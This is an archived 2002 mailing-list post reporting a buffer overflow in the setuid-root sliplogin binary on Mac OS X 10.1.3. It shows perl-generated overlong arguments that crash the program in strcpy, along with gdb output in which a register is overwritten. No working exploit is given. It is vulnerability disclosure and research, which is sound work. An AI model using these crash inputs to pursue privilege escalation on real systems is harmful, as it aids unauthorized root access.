Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Apple OSX sliplogin overflow

From: Kevin Finisterre <dotslash () snosoft com>
Date: Wed, 15 May 2002 15:41:20 -0700
(side note ... isn't it odd that I can run gdb on a suid binary?)

Osx version 10.1.3

[localhost:~] elguapo% ls -al /usr/sbin/sliplogin
-r-sr-xr-x  1 root  wheel  14700 Dec  8 10:49 /usr/sbin/sliplogin

[localhost:~] elguapo% sliplogin `perl -e 'print "A" x 9000'`
Bus error

[localhost:~] elguapo% uname -a
Darwin localhost 5.3 Darwin Kernel Version 5.3: Thu Jan 24 22:06:02 PST 2002; root:xnu/xnu-201.19.obj~1/RELEASE_PPC Power Macintosh powerpc 

[localhost:~] elguapo% id
uid=501(elguapo) gid=20(staff) groups=20(staff), 0(wheel), 80(admin)
[localhost:~] elguapo% ls -al /usr/sbin/sliplogin
-r-sr-xr-x  1 root  wheel  14700 Dec  8 10:49 /usr/sbin/sliplogin
[localhost:~] elguapo% gdb /usr/sbin/sliplogin
GNU gdb 5.0-20001113 (Apple version gdb-203) (Wed Nov 7 16:28:57 GMT 2001) (UI_OUT) 
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "powerpc-apple-macos10".
Reading symbols for shared libraries .. done
(gdb) r `perl -e 'print "A" x 1476'`
Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1477'`
[Switching to thread 1 (process 339 thread 0x1603)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x70004c88 in strcpy ()
(gdb) bt
#0  0x70004c88 in strcpy ()
#1  0x00001bd4 in ?? ()
#2  0x00002278 in ?? ()
#3  0x00001af4 in ?? ()
#4  0x00001924 in ?? ()
I have not been able to accomplish anything short of overwriting r0 with 41. If the sc command gets called you could control the next syscall by changing 
the value in r0. I personally can do nothing with it...

(gdb) r `perl -e 'print "A" x 1478'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1478'`
[Switching to thread 1 (process 351 thread 0x1c07)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x70004c88 in strcpy ()
(gdb) i r
r0             0x41     65

-KF
Previous By Date Next
Previous By Thread Next

Current thread: